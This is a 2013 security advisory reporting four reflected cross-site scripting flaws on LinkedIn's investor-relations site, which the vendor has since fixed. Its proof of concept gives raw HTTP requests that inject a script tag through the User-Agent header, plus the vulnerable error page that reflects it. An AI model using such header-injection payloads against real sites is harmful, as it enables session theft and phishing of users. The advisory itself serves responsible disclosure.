Multiple Reflected XSS vulnerabilities

Multiple Reflected XSS vulnerabilities

=============================================
INTERNET SECURITY AUDITORS ALERT 2013-006
- Original release date: 4th March 2013
- Last revised:  25th March 2013
- Discovered by: Eduardo Garcia Melia
- Severity: 4.3/10 (CVSS Base Scored)
=============================================

I. VULNERABILITY
-------------------------
Multiple Reflected XSS vulnerabilities in LinkedIn Investors.

II. BACKGROUND
-------------------------
LinkedIn is a social networking service and
website(http://www.linkedin.com/) operates the world's largest
professional network on the Internet with more than 187 million
members in over 200 countries and territories.

More Information: http://press.linkedin.com/about

III. DESCRIPTION
-------------------------
LinkedIn Investors is affected by Multiple reflected Cross-Site
Scripting vulnerabilities. An attacker can inject HTML or script code
in the context of victim's browser, so can perform XSS attacks, and
steal cookies of a targeted user. The affected resource is
http://investors.linkedin.com.

IV. PROOF OF CONCEPT
-------------------------
The XSS vulnerability its in User-Agent:
===============
First XSS
===============
        GET /releasedetail.cfm?ReleaseID=738977' HTTP/1.1
        Host: investors.linkedin.com
        Proxy-Connection: keep-alive
        Cache-Control: max-age=0
        Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: <script>alert("XSS")</script>
        Accept-Encoding: gzip,deflate,sdch
        Accept-Language: en-US,en;q=0.8
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
        Content-Length: 2

===============
Second XSS
===============
        GET /eventdetail.cfm?eventid=124442'-- HTTP/1.1
        Host: investors.linkedin.com
        Proxy-Connection: keep-alive
        Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: <script>alert("XSS")</script>
        Accept-Encoding: gzip,deflate,sdch
        Accept-Language: en-US,en;q=0.8
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
        Content-Length: 2
        
===============
Third XSS
=============== 
        GET /stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'--
        HTTP/1.1
        Host: investors.linkedin.com
        Proxy-Connection: keep-alive
        Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: <script>alert("XSS")</script>
        Referer: http://investors.linkedin.com/stocklookup.cfm
        Accept-Encoding: gzip,deflate,sdch
        Accept-Language: en-US,en;q=0.8
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
        Content-Length: 2
        
===============
Fourth XSS
=============== 
        GET /calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs&historic_Mo        nth=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate HTTP/1.1
        Host: investors.linkedin.com
        Proxy-Connection: keep-alive
        Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: <script>alert("XSS")</script>
        Referer: http://investors.linkedin.com/calculator.cfm
        Accept-Encoding: gzip,deflate,sdch
        Accept-Language: en-US,en;q=0.8
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
        Content-Length: 2

RESPONSE in all cases:

        HTTP/1.1 500 Internal Server Error
        Connection: close
        Date: Mon, 04 Mar 2013 11:34:48 GMT
        Server: Microsoft-IIS/6.0
        X-Powered-By: ASP.NET
        server-error: true
        Content-Type: text/html; charset=UTF-8

        <h2>Error occurred processing request</h2>

        <b>Error Diagnostic</b><p>
        <cfoutput>
        Element RESULT.TITLE is undefined in RELEASEDETAIL.  <br>The error
        occurred on line 175.

        Date/Time: Mon Mar 04 06:34:48 EST 2013<br>
        Browser: <script>alert("XSS")</script><br>
        Remote Address: 192.168.149.88<br>
        <!--- removed query string from error page - info sec viewed it as
        XSS - tws - 05/18/2010 --->
        </cfoutput>


V. BUSINESS IMPACT
------------------------
This flaw can be used by a malicious user to send phishing to the
linked in customers, abusing of the users trust on LinkedIn portal,
tricking the user. This user can be forward to a LinkedIn clone site
to stolen credentials, to some malicious site hosting malware and more.

VI. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the LinkedIn Investors:
http://investors.linkedin.com

VII. SOLUTION
-------------------------
Corrected by vendor.

VIII. REFERENCES
-------------------------
http://investors.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting

IX. CREDITS
-------------------------
These vulnerabilities have been discovered by
Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March  04, 2013: Initial release
March  10, 2013: Second release

XI. DISCLOSURE TIMELINE
-------------------------
March  04, 2013: Vulnerability acquired by
                 Internet Security Auditors (www.isecauditors.com)
March  10, 2013: Sent to Sec Team.
March  25, 2013: Request for update. Response regarding
                 it was already corrected. Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.


XIV. FOLLOW US
-------------------------
You can follow Internet Security Auditors, news and security
advisories at:
https://www.facebook.com/ISecAuditors
https://twitter.com/ISecAuditors
http://www.linkedin.com/company/internet-security-auditors
http://www.youtube.com/user/ISecAuditors